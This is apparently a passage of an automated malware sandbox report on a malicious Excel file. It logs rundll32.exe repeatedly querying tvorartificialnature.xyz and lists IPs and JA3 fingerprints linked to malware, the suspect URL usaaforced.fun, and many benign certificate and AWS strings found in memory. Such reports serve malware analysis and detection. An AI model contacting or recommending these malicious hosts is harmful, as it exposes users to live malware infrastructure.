Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 50.87.146.86 50.87.146.86
Source: Joe Sandbox View	IP Address: 199.79.62.99 199.79.62.99
Source: Joe Sandbox View	IP Address: 192.185.214.87 192.185.214.87

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 143.204.3.74:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 143.204.3.74:443 -> 192.168.2.22:49174 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DFB60433.png

Jump to behavior

Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
Source: rundll32.exe, 00000003.00000002.2499932403.0000000001B00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2184161879.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2178177559.0000000001D10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2499918134.0000000001BD0000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: metaflip.io

Source: rundll32.exe, 00000007.00000003.2176468982.00000000003B7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: rundll32.exe, 00000003.00000003.2340656783.00000000000DD000.00000004.00000001.sdmp	String found in binary or memory: http://crl.rootca1.a
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
Source: rundll32.exe, 00000007.00000003.2176468982.00000000003B7000.00000004.00000001.sdmp	String found in binary or memory: http://crt.comod
Source: rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crt.rootca1.am
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
Source: rundll32.exe, 00000003.00000002.2499932403.0000000001B00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2184161879.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2178177559.0000000001D10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2499918134.0000000001BD0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2499932403.0000000001B00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2184161879.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2178177559.0000000001D10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2499918134.0000000001BD0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2500139731.0000000001CE7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2184373019.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2178409552.0000000001EF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2500122657.0000000001DB7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2500139731.0000000001CE7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2184373019.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2178409552.0000000001EF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2500122657.0000000001DB7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://o.ss2.us/0
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.rootg2.amazontrust.com08
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.sca1b.amazontrust.com06
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://s.ss2.us/r.crl0
Source: rundll32.exe, 00000003.00000002.2501158491.0000000002DB0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2500139731.0000000001CE7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2184373019.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2178409552.0000000001EF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2500122657.0000000001DB7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000007.00000003.2224343749.00000000031E1000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2232322981.00000000031F6000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2177213287.000000000043A000.00000004.00000001.sdmp	String found in binary or memory: http://tvorartificialnature.xyz/
Source: rundll32.exe, 00000007.00000003.2188576987.00000000003B7000.00000004.00000001.sdmp	String found in binary or memory: http://tvorartificialnature.xyz/F
Source: rundll32.exe, 00000007.00000003.2229998305.00000000003B7000.00000004.00000001.sdmp	String found in binary or memory: http://tvorartificialnature.xyz/j
Source: rundll32.exe, 00000003.00000002.2499572164.00000000000F9000.00000004.00000020.sdmp	String found in binary or memory: http://usaaforced.fun/
Source: rundll32.exe, 00000003.00000002.2499572164.00000000000F9000.00000004.00000020.sdmp	String found in binary or memory: http://usaaforced.fun/Q
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp	String found in binary or memory: http://usaaforced.fun/k
Source: rundll32.exe, 00000003.00000002.2500139731.0000000001CE7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2184373019.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2178409552.0000000001EF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2500122657.0000000001DB7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2501158491.0000000002DB0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2501033372.0000000002C60000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rundll32.exe, 00000003.00000002.2499932403.0000000001B00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2184161879.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2178177559.0000000001D10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2499918134.0000000001BD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2500139731.0000000001CE7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2184373019.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2178409552.0000000001EF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2500122657.0000000001DB7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2499932403.0000000001B00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2184161879.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2178177559.0000000001D10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2499918134.0000000001BD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000007.00000002.2499918134.0000000001BD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://x.ss2.us/x.cer0&
Source: rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/aws-blog/1.0.46/js
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/da/js/1.0.47/aws-da.js
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/g11n-lib/2.0.67
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.376
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.376/style-awsm.css
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg
Source: rundll32.exe, 00000003.00000003.2110513457.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174357995.0000000000436000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logo
Source: rundll32.exe, 00000007.00000003.2174357995.0000000000436000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logoo
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-search/1.0.13/js
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.376/directories
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.376/libra-cardsui
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.376/libra-head.js
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.376/librastandardlib
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/plc/js/1.0.108/plc
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/pricing-calculator/js/1.0.2
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/psf/null
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/target/1.0.113/aws-target-mediator.js
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: https://amazon.com/
Source: rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: https://amazon.com/vt2
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://amazonwebservicesinc.tt.omtrdc.net
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/?nc1=h_ls
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/?nc2=h_lg
Source: rundll32.exe, 00000007.00000003.2225040318.00000000003B7000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/H
Source: rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: https://aws.amazon.com/Ht2
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ar/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ar/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/cn/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/cn/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/de/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/de/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/es/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/es/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/fr/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/fr/?nc1=h_ls
